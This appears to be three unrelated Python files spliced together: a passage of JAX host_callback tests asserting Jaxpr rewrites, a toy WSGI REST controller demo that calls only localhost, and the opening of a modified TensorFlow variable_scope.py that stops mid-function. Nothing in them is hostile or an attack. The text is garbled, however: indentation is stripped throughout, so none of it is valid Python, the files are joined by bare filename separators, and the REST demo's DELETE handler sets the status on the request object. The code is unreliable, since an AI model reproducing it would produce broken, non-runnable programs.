# Since it is somewhat annoying to update the Jaxpr assertions when we change
# the Jaxpr printing, we do not check these by default. It is recommended that
# before making changes to the code generation and Jaxpr rewriting, turn on
# the checking, update the expected Jaxpr, and then make the changes.
# assertMultiLineStrippedEqual(self, expected, str(rewritten))
del rewritten
def test_no_outfeed(self):
self.assertRewrite("""
{ lambda ; a.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_input_token=False,
has_output_token=False)
self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_output_token=False)
self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c, d, e) }""", lambda x: x + x * x, [0])
def test_simple_outfeed(self):
self.assertRewrite("""
{ lambda ; a d e.
let b = add a a
c f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b d e
in (c, f, g) }""", lambda x: hcb.id_print(x + x), [0])
def test_simple_outfeed_without_input_token(self):
self.assertRewrite("""
{ lambda ; a b.
let e = create_token a b
f = create_token a b
c = add a b
d g h = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c e f
in (d,) }""", lambda x1, x2: hcb.id_print(x1 + x2), [1, 2],
has_input_token=False, has_output_token=False)
def test_simple_outfeed_without_input_token_nor_invars(self):
self.assertRewrite("""
{ lambda ; .
let b = create_token
c = create_token
a d e = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] 42 b c
in (a,) }""", lambda: hcb.id_print(42), [],
has_input_token=False, has_output_token=False)
def test_multiple_tap_without_dependencies(self):
def f(x):
hcb.id_print(x, what="x")
hcb.id_print(x + 1, what="x + 1")
return 2
self.assertRewrite("""
{ lambda ; a c d.
let _ e f = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a c d
b = add a 1
_ g h = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b e f
in (2, g, h) }""", f, [1])
def test_cond(self):
y = jnp.ones(5) # captured const
def func(x, z):
return lax.cond(z > 0, (1, 2), lambda a: (a[0], jnp.zeros(5)),
z, lambda a: (hcb.id_print(a), y))
self.assertRewrite("""
{ lambda a ; b c h i.
let d = gt c 0
e = convert_element_type[ new_dtype=int32 ] d
f g j k =
cond[ branches=( { lambda ; a b c d f g.
let e h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] d f g
in (e, a, h, i) }
{ lambda ; f_ a b c g h.
let d = broadcast_in_dim[ broadcast_dimensions=( )
shape=(5,) ] 0.00
in (a, d, g, h) } )
linear=(False, False, False, False, False, False) ] e a 1 2 c h i
in (f, g, j, k) }""", func, [y, 5])
def test_while(self):
ct_body = jnp.ones(5, np.float32) # captured const for the body
ct_cond = jnp.ones(5, np.float32) # captured const for the conditional
def func(x):
# x: f32[5]
# c: (f32[5], f32)
return lax.while_loop(lambda c: c[1] < jnp.sum(c[0] + ct_cond),
lambda c: (ct_body, hcb.id_print(c[1]) + 1.),
(x, np.float32(1.)))
self.assertRewrite("""
{ lambda a b ; c f g.
let d e h i =
while[ body_jaxpr={ lambda ; a b c f g.
let d h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c f g
e = add d 1.00
in (a, e, h, i) }
body_nconsts=1
cond_jaxpr={ lambda ; a b c g h.
let d = add b a
e = reduce_sum[ axes=(0,) ] d
f = lt c e
in (f,) }
cond_nconsts=1 ] a b c 1.00 f g
in (d, e, h, i) }""", func, [ct_body])
def test_while_pred_outfeed(self):
"""A while with outfeed in the pred."""
ct_body = jnp.ones(5) # captured const for the body
ct_cond = jnp.ones(2) # captured const for the conditional
def func(x):
return lax.while_loop(lambda c: hcb.id_print(ct_cond, result=c[1]) < 5,
lambda c: (ct_body, hcb.id_print(c[1]) + 1),
(x, 1))
self.assertRewrite("""
{ lambda a b ; c f g.
let j k l = xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a g h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_before ] a c 1 f g
bf d e h i =
while[ body_jaxpr={ lambda ; r s t u v w x.
let y z ba bb =
xla_call[ call_jaxpr={ lambda ; a b c f g.
let d h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c f g
e = add d 1
in (a, e, h, i) }
donated_invars=(False, False, False, False, False)
name=body ] s u v w x
bc bd be =
xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a g h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_body ] r y z ba bb
in (bc, y, z, bd, be) }
body_nconsts=2
cond_jaxpr={ lambda ; m n o p q.
let
in (m,) }
cond_nconsts=0 ] a b j c 1 k l
in (d, e, h, i) }""", func, [ct_body])
def test_scan(self):
y = jnp.ones(5) # captured const
def func(x):
return lax.scan(lambda c, a: (hcb.id_print(c), y), (1, 2), x)
self.assertRewrite("""
{ lambda a ; b f g.
let c d h i e =
scan[ jaxpr={ lambda ; a b c g h d.
let e f i j =
outside_call[ arg_treedef=PyTreeDef(tuple, [*,*])
callback=...
has_token=True
identity=True ] b c g h
in (e, f, i, j, a) }
length=5
linear=(False, False, False, False, False, False)
num_carry=4
num_consts=1
reverse=False
unroll=1 ] a 1 2 f g b
in (c, d, e, h, i) }""", func, [y])
def test_scan_custom_jvp(self):
"""custom JVP, inside scan.
This exercises the custom_jvp_call_jaxpr primitives."""
@api.custom_jvp
def f(x):
return x * hcb.id_print(x)
@f.defjvp
def f_jvp(primals, tangents):
x, = primals
x_dot, = tangents
primal_out = f(x)
tangent_out = 3. * x * hcb.id_print(x_dot)
return primal_out, tangent_out
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((5,), 0.7)
self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0 ] b e f
d = add a c
in (d, g, h, 0.00) }
length=5
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
let e j k = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0 ] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=5
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e = mul b d
f i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True
transforms=(('transpose',),) ] e g h
in (*, b, i, j, *, f) }
length=5
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", api.grad(g), [arg])
def test_scan_custom_vjp(self):
"""custom VJP, inside scan.
This exercises the custom_vjp_call_jaxpr primitives."""
@api.custom_vjp
def f(x):
return x * hcb.id_print(x)
# f_fwd: a -> (b, residual)
def f_fwd(x):
return f(x), 3. * x
# f_bwd: (residual, CT b) -> [CT a]
def f_bwd(residual, ct_b):
return residual * hcb.id_print(ct_b),
f.defvjp(f_fwd, f_bwd)
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_vjp_call_jaxpr[
fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0
] b e f
d = add a c
in (d, g, h, 0.00) }
length=2
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
let e j k = custom_vjp_call_jaxpr[
fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0
] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=2
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b g h
f = mul d e
in (*, b, i, j, *, f) }
length=2
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", api.grad(g), [arg])
def test_remat_loop(self):
def f(k, x):
x = hcb.id_print(k + x)
return -k * x
def loss(k):
return lax.fori_loop(0, 1, api.remat(f), k)
self.assertRewrite("""
{ lambda ; a c d.
let _ _ b e f =
while[ body_jaxpr={ lambda ; a b c f g.
let d = add a 1
e h i = remat_call[ call_jaxpr={ lambda ; a b g h.
let c = add a b
d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c g h
e = neg a
f = mul e d
in (f, i, j) }
concrete=False
name=f ] a c f g
in (d, b, e, h, i) }
body_nconsts=0
cond_jaxpr={ lambda ; a b c e f.
let d = lt a b
in (d,) }
cond_nconsts=0 ] 0 1 a c d
in (b, e, f) }""", loss, [2])
def test_named_call(self):
def tap_scalar(init, do_print=False):
@partial(api.named_call, name="step")
def step(acc, step_nr):
acc = acc + step_nr
maybe_print(do_print, step_nr, what="step_nr")
return acc, None
return lax.scan(step, init, np.arange(2, dtype=np.int32))
self.assertRewrite("""
{ lambda a ; b d e.
let c = scan[ jaxpr={ lambda ; a b.
let c = named_call[ call_jaxpr={ lambda ; a b.
let c = add a b
in (c,) }
name=step ] a b
in (c,) }
length=2
linear=(False, False)
num_carry=1
num_consts=0
reverse=False
unroll=1 ] b a
in (c, d, e) }""", tap_scalar, [np.int32(3)])
def test_pmap(self):
def f(xv):
api.pmap(lambda x: jnp.sin(hcb.id_print(x, tap_with_device=True)),
axis_name="i")(xv)
self.assertRewrite("""
{ lambda ; a b c.
let _ d e = xla_pmap[ axis_name=i
axis_size=1
backend=None
call_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = sin b
in (c, f, g) }
devices=None
donated_invars=(False, False, False)
global_arg_shapes=(None,)
global_axis_size=None
in_axes=(0, 0, 0)
name=<lambda>
out_axes=(0, 0, 0) ] a b c
in (d, e) }""", f, [np.array([2.], dtype=np.float32)])
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
|
web_10.py | from web_06 import WSGIApplication
app = WSGIApplication()
class RestController:
def __call__(self, req, resp):
method = req.environ['REQUEST_METHOD']
action = getattr(self, method, self._not_found)
return action(req, resp)
def _not_found(self, environ, resp):
resp.status = '404 Not Found'
return b'{}' # Provide an empty JSON document
import json
@app.route('/resources/?(?P<id>\\w*)')
class ResourcesRestController(RestController):
RESOURCES = {}
def GET(self, req, resp):
resource_id = req.urlargs['id']
if not resource_id:
# Whole catalog requested
return json.dumps(self.RESOURCES).encode('utf-8')
if resource_id not in self.RESOURCES:
return self._not_found(req, resp)
return json.dumps(self.RESOURCES[resource_id]).encode('utf-8')
def POST(self, req, resp):
content_length = int(req.environ['CONTENT_LENGTH'])
data = req.environ['wsgi.input'].read(content_length).decode('utf-8')
resource = json.loads(data)
resource['id'] = str(len(self.RESOURCES)+1)
self.RESOURCES[resource['id']] = resource
return json.dumps(resource).encode('utf-8')
def DELETE(self, req, resp):
resource_id = req.urlargs['id']
if not resource_id:
return self._not_found(req, resp)
self.RESOURCES.pop(resource_id, None)
req.status = '204 No Content'
return b''
import threading
threading.Thread(target=app.serve, daemon=True).start()
from web_03 import http_request
_, resp = http_request('http://localhost:8000/resources', method='POST',
data=json.dumps({'name': 'Mario',
'surname': 'Mario'}).encode('utf-8'))
print('NEW RESOURCE: ', resp)
_, resp = http_request('http://localhost:8000/resources')
print('ALL RESOURCES: ', resp)
http_request('http://localhost:8000/resources', method='POST',
data=json.dumps({'name': 'Luigi',
'surname': 'Mario'}).encode('utf-8'))
_, resp = http_request('http://localhost:8000/resources')
print('ALL RESOURCES: ', resp)
_, resp = http_request('http://localhost:8000/resources/1')
print('RESOURCES #1: ', resp)
http_request('http://localhost:8000/resources/2', method='DELETE')
_, resp = http_request('http://localhost:8000/resources')
print('ALL RESOURCES', resp)
|
variable_scope.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class to store named variables and a scope operator to manage sharing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as collections_lib
import copy
import enum # pylint: disable=g-bad-import-order
import functools
import sys
import threading
import traceback
import six
from six import iteritems
from six.moves import xrange, zip # pylint: disable=redefined-builtin
from tensorflow.python import tf2
from tensorflow.python.eager import context
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import kv_variable_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import deprecation
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"AUTO_REUSE", "VariableScope", "get_variable_scope", "get_variable",
"get_local_variable", "variable_scope", "variable_op_scope",
"no_regularizer", "VariableSynchronization", "VariableAggregation",
"get_embedding_variable", "get_dynamic_dimension_embedding_variable",
"get_multihash_variable", "get_hash_table"
]
_api_usage_gauge = monitoring.BoolGauge(
"/tensorflow/api/resource_variables",
"Whether variable_scope.enable_resource_variables() is called.")
class _PartitionInfo(object):
"""Holds partition info used by initializer functions."""
def __init__(self, full_shape, var_offset):
"""Constructor.
Args:
full_shape: Tuple or list of `int` indicating the full combined shape of
the partitioned variables.
var_offset: Tuple or list of `int` specifying offset of this partition
with respect to the full variable for each dimension.
Raises:
TypeError: If `full_shape` or `var_offset` is not a sequence.
ValueError: If `full_shape` or `var_offset` differ in length. If
`var_offset` exceeds `full_shape` in any dimension.
"""
if not isinstance(full_shape, collections_lib.Sequence) or isinstance(
full_shape, six.string_types):
raise TypeError(
"`full_shape` must be a sequence (like tuple or list) instead of " +
type(full_shape).__name__)
if not isinstance(var_offset, collections_lib.Sequence) or isinstance(
var_offset, six.string_types):
raise TypeError(
"`var_offset` must be a sequence (like tuple or list) instead of " +
type(var_offset).__name__)
if len(var_offset) != len(full_shape):
raise ValueError(
"Expected equal length, but `var_offset` is of length {} while "
"full_shape is of length {}.".format(
len(var_offset), len(full_shape)))
for offset, shape in zip(var_offset, full_shape):
if offset < 0 or offset >= shape:
raise ValueError(
"Expected 0 <= offset < shape but found offset={}, shape={} for "
"var_offset={}, full_shape={}".format(offset, shape, var_offset,
full_shape))
self._full_shape = full_shape
self._var_offset = var_offset
@property
def full_shape(self):
return self._full_shape
@property
def var_offset(self):
return self._var_offset
def single_offset(self, shape):
"""Returns the offset when the variable is partitioned in at most one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the offset in the dimension along which the variable is
partitioned. Returns 0 if the variable is not being partitioned.
Raises:
ValueError: Depending on self.single_slice_dim().
"""
single_slice_dim = self.single_slice_dim(shape)
# If this variable is not being partitioned at all, single_slice_dim() could
# return None.
if single_slice_dim is None:
return 0
return self.var_offset[single_slice_dim]
def single_slice_dim(self, shape):
"""Returns the slice dim when the variable is partitioned only in one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the dimension that the variable is partitioned in, or
`None` if the variable doesn't seem to be partitioned at all.
Raises:
TypeError: If `shape` is not a sequence.
ValueError: If `shape` is not the same length as `self.full_shape`. If
the variable is partitioned in more than one dimension.
"""
if not isinstance(shape, collections_lib.Sequence) or isinstance(
shape, six.string_types):
raise TypeError(
"`shape` must be a sequence (like tuple or list) instead of " +
type(shape).__name__)
if len(shape) != len(self.full_shape):
raise ValueError(
"Expected equal length, but received shape={} of length {} while "
"self.full_shape={} is of length {}.".format(shape, len(shape),
self.full_shape,
len(self.full_shape)))
for i in xrange(len(shape)):
if self.var_offset[i] + shape[i] > self.full_shape[i]:
raise ValueError(
"With self.var_offset={}, a partition of shape={} would exceed "
"self.full_shape={} in dimension {}.".format(
self.var_offset, shape, self.full_shape, i))
slice_dim = None
for i in xrange(len(shape)):
if shape[i] == self.full_shape[i]:
continue
if slice_dim is not None:
raise ValueError(
"Cannot use single_slice_dim() with shape={} and "
"self.full_shape={} since slice dim could be either dimension {} "
"or {}.".format(shape, self.full_shape, i, slice_dim))
slice_dim = i
return slice_dim
class _ReuseMode(enum.Enum):
"""Mode for variable access within a variable scope."""
# Indicates that variables are to be fetched if they already exist or
# otherwise created.
AUTO_REUSE = 1
# TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of
# enum values.
# REUSE_FALSE = 2
# REUSE_TRUE = 3
# TODO(apassos) remove these forwarding symbols.
VariableSynchronization = variables.VariableSynchronization # pylint: disable=invalid-name
VariableAggregation = variables.VariableAggregation # pylint: disable=invalid-name
AUTO_REUSE = _ReuseMode.AUTO_REUSE
tf_export(v1=["AUTO_REUSE"]).export_constant(__name__, "AUTO_REUSE")
AUTO_REUSE.__doc__ = """
When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that
get_variable() should create the requested variable if it doesn't exist or, if
it does exist, simply return it.
"""
_DEFAULT_USE_RESOURCE = tf2.enabled()
@tf_export(v1=["enable_resource_variables"])
def enable_resource_variables():
"""Creates resource variables by default.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = True
_api_usage_gauge.get_cell().set(True)
@tf_export(v1=["resource_variables_enabled"])
def resource_variables_enabled():
"""Returns `True` if resource variables are enabled.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
return _DEFAULT_USE_RESOURCE
@deprecation.deprecated(
None, "non-resource variables are not supported in the long term")
@tf_export(v1=["disable_resource_variables"])
def disable_resource_variables():
"""Opts out of resource variables.
If your code needs tf.disable_resource_variables() to be called to work
properly please file a bug.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = False
_api_usage_gauge.get_cell().set(False)
class _VariableStore(object):
"""Variable store that carries a number of named Variables.
New variable names and new variables can be created; all stored
variables are initialized with the initializer passed to __init__.
Attributes:
vars: a dictionary with string names (same as passed in GetVar) as keys and
the corresponding TensorFlow Variables as values.
"""
def __init__(self):
"""Create a variable store."""
self._vars = {} # A dictionary of the stored TensorFlow variables.
self._partitioned_vars = {} # A dict of the stored PartitionedVariables.
self._store_eager_variables = False
def get_hashtable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
collections=None,
reuse=None,
trainable=None,
synchronization=VariableSynchronization.AUTO,
partitioner=None,
children=None):
if context.executing_eagerly():
if not self._store_eager_variables and reuse:
raise RuntimeError(
"When eager execution is enabled variable reuse is only supported"
" when an EagerVariableStore is active. See the documentation on"
" EagerVariableStore for example usage.")
if self._store_eager_variables:
reuse = AUTO_REUSE
try:
dtype = dtype.base_dtype
except AttributeError:
# .base_dtype not existing means that we will try and use the raw dtype
# which was passed in - this might be a NumPy type which is valid.
pass
def _hashtable_getter(name,
shape=None,
dtype=dtypes.float32,
initializer=None,
collections=None,
reuse=None,
trainable=None,
partitioner=None,
children=None):
# HashTable cases
if partitioner is not None:
if not callable(partitioner):
raise ValueError(
"Partitioner must be callable, but received: %s" % partitioner)
return self._get_distribute_hashtable(name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
collections=collections,
reuse=reuse,
trainable=trainable,
partitioner=partitioner,
children=children)
else:
return self._get_hashtable(name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
reuse=reuse,
collections=collections,
trainable=trainable,
partitioner=partitioner,
children=children)
return _hashtable_getter(name,
shape=shape,
dtype=dtype,
initializer=initializer,
collections=collections,
reuse=reuse,
trainable=trainable,
partitioner=partitioner,
children=children)
def _get_hashtable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
reuse=None,
collections=None,
trainable=None,
partitioner=None,
children=None):
from tensorflow.python.ops.hash_table import hash_table
if context.executing_eagerly():
raise NotImplementedError("Hashtable variables are not yet supported "
"when eager execution is enabled.")
if partitioner is not None:
raise ValueError(
"Trying to get a hashtable %s, but partitioner is not None." % name)
if name in self._vars:
if reuse is False:
raise ValueError(
"Hashtable variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?"
% name)
existing_var = self._vars[name]
shape = tensor_shape.as_shape(shape)
if not isinstance(existing_var, hash_table.HashTable):
raise ValueError(
"Trying to reuse hashtable variable %s, but an existing variable is not"
" a HashTable, can not reuse it." % (name))
if not shape.is_compatible_with(existing_var.shape):
raise ValueError(
"Trying to reuse hashtable variable %s, but specified shape %s "
"and found shape %s."
% (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse hashtable variable %s, but specified dtype %s "
"and found dtype %s."
% (name, dtype.name, existing_var.dtype.name))
return existing_var
if reuse is True:
raise ValueError("Hashtable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
hashtable_var = hash_table.HashTable(shape=shape,
dtype=dtype,
distributed_name=name,
initializer=initializer,
collections=collections,
trainable=trainable,
children=children,
name=name)
self._vars[name] = hashtable_var
return hashtable_var
def _get_distribute_hashtable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
reuse=None,
collections=None,
trainable=None,
partitioner=None,
children=None):
from tensorflow.python.ops.hash_table import hash_table
if context.executing_eagerly():
raise NotImplementedError("Distribute Hashtable variables are not yet supported "
"when eager execution is enabled.")
if partitioner is None:
raise ValueError(
"Trying to get a distribute hashtable %s, but partitioner is not specified." % name)
if name in self._vars:
raise ValueError(
"A distribute hashtable was provided, but an single version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created with single?" % name)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Hashtable variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?"
% name)
existing_var = self._partitioned_vars[name]
if not isinstance(existing_var, hash_table.DistributedHashTable):
raise ValueError(
"Trying to reuse distribute hashtable variable %s, but an existing variable is not"
" a DistributedHashTable, can not reuse it." % (name))
shape = tensor_shape.as_shape(shape)
if not shape.is_compatible_with(existing_var.shape):
raise ValueError(
"Trying to reuse distribute hashtable variable %s, but specified shape %s "
"and found shape %s."
% (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse distribute hashtable variable %s, but specified dtype %s "
"and found dtype %s."
% (name, dtype.name, existing_var.dtype.name))
cur_slicer = partitioner(hash_table.DistributedHashTable._DEFAULT_SLICER_SIZE)
if cur_slicer != existing_var._slicer:
raise ValueError(
"Trying to reuse distribute hashtable variable %s, but specified partitioner split result is not equal to origin: [{}, {}]".format(cur_slicer, existing_var._slicer))
return existing_var
if reuse is True:
raise ValueError("Distribute hashtable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
distribute_hashtable_var = hash_table.DistributedHashTable(shape=shape,
dtype=dtype,
initializer=initializer,
collections=collections,
trainable=trainable,
partitioner=partitioner,
children=children,
name=name)
for i in range(len(distribute_hashtable_var.partitions)):
hashtable_full_name = "%s/HashTable_%d" % (name, i)
if hashtable_full_name in self._vars:
raise ValueError("Hashtable variable with name %s already exists. Conflict when create "
"distribute hashtable with partition %d." % (hashtable_full_name, i))
self._vars[hashtable_full_name] = distribute_hashtable_var.partitions[i]
self._partitioned_vars[name] = distribute_hashtable_var
return distribute_hashtable_var
def get_variable(self,
name,
shape=None,
embedding_block_num=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE,
invalid_key=None,
evconfig=variables.EmbeddingVariableConfig(),
ht_partition_num=1000):
"""Gets an existing variable with these parameters or create a new one.
If a variable with the given name is already stored, we return the stored
variable. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.compat.v1.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable.
regularizer: A (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of
variables. When eager execution is enabled this argument is always
forced to be False.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`). `trainable`
defaults to `True`, unless `synchronization` is set to `ON_READ`, in
which case it defaults to `False`.
collections: List of graph collections keys to add the `Variable` to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the `Variable` reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and dtype of the `Variable` to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates
instead an experimental ResourceVariable which has well-defined
semantics. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be true.
custom_getter: Callable that takes as a first argument the true getter,
and allows overwriting the internal get_variable method. The signature
of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes: `def
custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed: `def
custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs): return getter(name +
'_suffix', *args, **kwargs) ```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
or when violating reuse during variable creation.
RuntimeError: when eager execution is enabled and not called from an
EagerVariableStore.
"""
if custom_getter is not None and not callable(custom_getter):
